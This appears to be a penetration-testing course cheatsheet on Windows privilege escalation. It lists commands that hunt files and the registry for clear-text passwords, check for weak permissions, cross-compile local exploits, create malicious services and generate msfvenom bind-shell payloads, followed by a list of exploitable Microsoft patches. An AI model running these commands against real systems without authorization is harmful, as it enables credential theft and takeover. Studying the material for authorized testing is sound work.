Penetration Testing 102 - Windows Privilege Escalation Cheatsheet

OS and service pack

  • systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
  • ver

System name

  • hostname

Who are you?

  • whoami
  • echo %username%

Finding other users

  • net users
  • net user username

Clear-text passwords

  • c:\unattend.txt
  • c:\sysprep.ini - [Clear Text]
  • c:\sysprep\sysprep.xml - [Base64]
  • findstr /si password *.txt *.xml *.ini
  • reg query HKLM /s | findstr /i password > temp.txt
  • reg query HKCU /s | findstr /i password > temp.txt
  • reg query HKLM /f password /t REG_SZ /s
  • reg query HKCU /f password /t REG_SZ /s

Finding weak directory permissions

  • accesschk.exe /accepteula
  • accesschk.exe -uwdqs users c:\
  • accesschk.exe -uwdqs "Authenticated Users" c:\

Finding weak file permissions

  • accesschk.exe -uwqs users c:\*.*
  • accesschk.exe -uwqs "Authenticated Users" c:\*.*
  • cacls "c:\Program Files" /T | findstr Users

Weak Service permissions

  • accesschk.exe -uwcqv *

Cross compile exploits

  • cp /usr/share/exploitdb/platforms/windows/local/<exploit>.c /tmp/
  • cd /root/.wine/drive_c/MinGW/bin
  • wine gcc -o w00t.exe /tmp/<exploit>.c -l <lib>

PSexec

  • psexec.py <user>@<host> <cmd>
  • psexec.exe \\<host> <cmd>

Services

  • sc create <servicename> binpath= "c:\windows\system32\cmd.exe /k <pathtobinaryexecutable>" DisplayName= <displayname>
  • sc start <servicename>

Creating bind shells

  • msfvenom -p windows/shell_bind_tcp -f exe -o <Filename.exe> LPORT=<BindPort>
  • msfvenom -p windows/shell_bind_tcp -f dll -o <Filename.dll> LPORT=<BindPort>

Privilege Escalation Exploits by Patch

  • MS10-015
  • MS10-059
  • MS10-092
  • MS11-080
  • MS13-005
  • CVE-2013-3660
  • MS13-053
  • MS13-081
  • MS14-058
  • MS14-068
  • MS14-070
  • MS15-001
  • MS15-051
  • MS15-052